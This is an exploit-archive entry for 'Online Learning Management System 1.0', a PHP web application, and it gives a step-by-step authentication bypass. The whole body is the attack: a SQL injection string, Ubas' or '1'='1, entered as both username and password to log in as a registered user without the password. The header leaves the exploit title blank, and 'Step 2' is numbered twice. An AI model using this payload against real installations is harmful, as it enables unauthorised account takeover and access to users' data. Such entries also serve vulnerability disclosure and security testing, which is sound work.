Online Learning Management System 1.0 - Authentication Bypass

2020-12-23
ID: 103814
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Exploit Author: Aakash Madaan (Godsky)
# Date: 2020-12-22
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/7339/learning-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=7339&title=Online+Learning+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: Parrot OS
# Description: Easy authentication bypass vulnerability on the application allows an attacker to log in as the registered user without password.

Step 1: Go to http://localhost/ and register a new user or try to login as
already registered user (Ubas).

Step 2: On the login page, use query { Ubas' or '1'='1 } as username

Step 2: On the login page, use same query { Ubas' or '1'='1 } as password

All set you should be logged in as Ubas.
1-4-2 (www01)